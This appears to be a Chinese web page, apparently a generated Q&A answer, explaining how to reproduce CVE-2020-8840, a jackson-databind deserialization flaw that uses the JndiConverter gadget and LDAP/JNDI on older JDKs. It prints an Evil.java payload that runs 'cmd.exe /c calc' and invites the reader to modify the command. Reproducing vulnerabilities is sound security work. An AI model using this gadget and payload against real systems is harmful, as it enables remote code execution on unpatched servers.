CVE-2020-8840 poc
时间: 2023-09-22 14:11:46 浏览: 155
cve-2020-8840.zip
根据引用提到的CVE-2020-8840漏洞复现,以及引用中提到的jackson-databind更新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter,可以得知该漏洞可以绕过黑名单类,并且在较低的JDK版本下可导致远程代码执行(RCE)。
根据引用提到的LDAP利用方式,可以使用JDK版本为JDK 11.0.1、8u191、7u201、6u211之前的JDK版本来进行漏洞利用。在这里,我们采用了JDK 1.8.0_181版本。
根据引用提到的Evil.java文件内容,我们可以编写一个恶意代码用于漏洞利用,具体如下所示:
```java
public class Evil {
public Evil(){
try{
Runtime.getRuntime().exec("cmd.exe /c calc");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Evil e = new Evil();
}
}
```
这段代码会启动Windows计算器(calc.exe)。这是一个简单的示例,你可以根据需要进行修改。
带有这段恶意代码的POC(Proof of Concept)可以用于验证和演示CVE-2020-8840漏洞的存在。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
阅读全文